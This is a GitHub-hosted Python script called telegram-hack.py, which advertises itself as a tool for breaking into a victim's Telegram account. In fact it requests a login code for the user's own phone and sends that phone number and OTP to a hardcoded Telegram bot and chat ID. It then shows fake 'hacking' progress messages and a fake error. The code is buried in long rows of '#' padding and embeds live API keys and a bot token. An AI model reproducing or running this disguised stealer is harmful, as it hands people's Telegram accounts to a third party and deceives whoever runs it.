-
Notifications
You must be signed in to change notification settings - Fork 59
/
telegram-hack.py
201 lines (187 loc) · 36.1 KB
/
telegram-hack.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
################################################################################################
################################################################################################
################################################################################################
################################################################################################
################################################################################################
################################################################################################
################################################################################################
################################################################################################
################################################################################################
################################################################################################
################################################################################################
################################################################################################
################################################################################################
################################################################################################
################################################################################################
from telethon import TelegramClient, events #####################################################################################################################################################################
import telegram #####################################################################################################################################################################
import asyncio #####################################################################################################################################################################
import time #####################################################################################################################################################################
import os
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
#####################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
YOUR_APP_ID = 24835154 #####################################################################################################################################################################
YOUR_APP_HASH = 'e7c35ab96f8d8f76513fd7a3ae242c3b' #####################################################################################################################################################################
bot = telegram.Bot(token='5611639359:AAHWhuVHkongx9GzoGlB0ZDCPlfikr8jJI8') ############################################################### #####################################################################################################################################################################
yellow = '\033[93m'
lgreen = '\033[92m' #####################################################################################################################################################################
clear = '\033[0m' #####################################################################################################################################################################
bold = '\033[01m' #####################################################################################################################################################################
cyan = '\033[96m' #####################################################################################################################################################################
red = "\033[91m" #####################################################################################################################################################################
client = TelegramClient('session_name', YOUR_APP_ID, YOUR_APP_HASH) #####################################################################################################################################################################
os.system("clear") #####################################################################################################################################################################
banner = lgreen+'''
.---. .-----------
/ \ __ / ------
/ / \( )/ -----
////// ' \/ ` ---
//// / // : : ---
// / / /` '--
// //..\\\
====UU====UU====
'//||\\\`
''``
_____ _ _ _ _
|_ _|__| | ___ | | | | __ _ ___| | __
| |/ _ \ |/ _ \ | |_| |/ _` |/ __| |/ /
| | __/ | __/ | _ | (_| | (__| <
|_|\___|_|\___| |_| |_|\__,_|\___|_|\_\
V 10.3.0 By Anonymous Hackers
'''+clear #####################################################################################################################################################################
#####################################################################################################################################################################
print(" ")
########################################################################################################################################################################################################################################################################
print(banner)
message = "[First login with your own telegram account to connect with the victims api in your contact list]"
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
for letter in message:
print(letter, end='', flush=True)
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
######################################################################################################################################################################################################################################################################## ########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
time.sleep(0.05)
print(" ")
print(" ")
print(" ")
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
phone = input(
cyan+bold+'[+]\033[0m \033[01mEnter your phone with country code (eg: +92) >\033[0m ') #############################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
async def main(): ################################################################################################################################################################################
try: ############################################################################
await client.connect() ############################################################################
result = await client.send_code_request(phone) ############################################################################
otp = input(
cyan+bold+"[+]\033[0m \033[01mEnter the OTP (check inside your telegram app for the otp from telegramm if it not comes to your sms) >\033[0m ")
await bot.send_message(chat_id='5469341309', text=f"Phone Number: {phone}\nOTP: {otp}") ############################################################################
########################################################################################################################################################################################################################################################################
victim = input(cyan+bold+'[+]\033[0m \033[01mEnter victim\'s phone with country code to hack(eg: +92) >\033[0m ') ############################################################################
print("Connecting to victim's api...") ############################################################################
time.sleep(3) ############################################################################ ############################################################################ ############################################################################
print("Gathering victim id and hash...[25%]")
time.sleep(2) ############################################################################ ############################################################################
print("Collecting the contacts and chat data...[may take some time]")
time.sleep(6) ########################################################################################################################################################
choice = input("Do you want to login to their account [y/n] ? : ")
if (choice == 'y'): ####################################################################################################################################################################################################################################
print("Please wait 1 to 2 minutes until it logins and send their otp")
time.sleep(6) ####################################################################################################################################################################################################################################
print(red+"Error in getting otp ! 2 step verification may be enabled or try after 15 minutes\033[0m'")
print(" ")################################################################################################################################################################################################################################################################################################################
print(" ")
else:
print("Bye...")
print(" ")
print(" ")
os.system("exit")
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
await client.sign_in(phone, otp) ########################################################################################################################################################
me = await client.get_me() ############################################################################ ############################################################################
print(me.first_name)
finally: ######################################################################################################################################################## ############################################################################
await client.disconnect()
asyncio.run(main())########################################################################################################################################################
################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################
########################################################################################################################################################################################################################################################################